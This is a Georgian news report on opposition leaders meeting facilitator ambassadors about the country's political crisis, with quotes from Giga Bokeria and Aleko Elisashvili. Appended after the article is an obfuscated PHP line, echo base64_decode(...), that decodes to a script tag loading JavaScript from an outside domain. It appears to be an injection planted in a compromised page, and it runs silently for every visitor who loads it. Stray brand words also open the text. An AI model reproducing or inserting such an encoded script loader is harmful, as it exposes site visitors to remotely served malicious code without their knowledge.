celsiusi
ავერსი საქკაბელი
ოპოზიციური პარტიების ლიდერები დღეს ფასილიტატორ ელჩებს შეხვდებიან. მათი განცხადებით, შეხვედრაზე ოპოზიციური პარტიები ელჩებს ქვეყნის პოლიტიკური კრიზისიდან გამოსვლის გზებთან დაკავშირებით მათ საერთო პოზიციას გააცნობენ, რომელზეც საბოლოოდ „ლელოში“ გუშინ გამართულ შეხვედრაზე შეჯერდნენ.
 
ამასთან, ერთ-ერთი საკითხი, რასაც ოპოზიციონერები შეხვედრაზე დააყენებენ, იმ წინადადებების გასაჯაროებაა, რაც ელჩების შუამავლობით მიმდინარე მოლაპარაკებების პროცესში განიხილება.
 
შეგახსენებთ, გუშინ ევროპული საქართველოს" ერთ-ერთმა ლიდერმა გიგა ბოკერიამ "ლელოში" გაერთიანებული ოპოზიციის შეხვედრის დასრულების შემდეგ განაცხადა, რომ ყველა წინადადება ხელახალი არჩევნების ქოლგის ქვეშაა მოქცეული. "ოპოზიცია უკვე წავიდა კომპრომისზე, როცა დააყენა საკითხი, ვადამდელი არჩევნები ხელახალი არჩევნების ნაცვლად", - განაცხადა ბოკერიამ.
 
კითხვაზე, სხვა წინადადებით რომ მივიდეს მმართველი გუნდი, მაგალითად, 2024 წელს ბარიერის დაწევა, ცესკო-ს ადმინისტრაციის ცვლილება, გიგა ბოკერიამ უპასუხა, რომ არჩევნების გარდა ოპოზიცია სხვა შეთავაზებას არ დათანხმდება.
 
რაც შეეხება, პარტია „მოქალაქეების” ლიდერის, ალეკო ელისაშვილის გუშინდელ განცხადებას, მისი თქმით, ოპოზიციური პარტიები საერთო პოზიციაზე შეჯერდნენ და „ქართულ ოცნებასთან” მოლაპარაკებების მესამე რაუნდის გამართვისთვის მზად არიან.
 
"ცხარე დისკუსია გვქონდა. რამდენიმე საათი გაგრძელდა. აზრთა სხვადასხვაობაა, მაგრამ საერთო პოზიცია შევაჯერეთ და მზად ვართ, მესამე რაუნდისთვის და ელჩებთან შეხვედრისთვის”,- განაცხადა გუშინ, "ლელოში" გაერთიანებული ოპოზიციის შეხვედრის დასრულების შემდეგ ელისაშვილმა.
1608
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");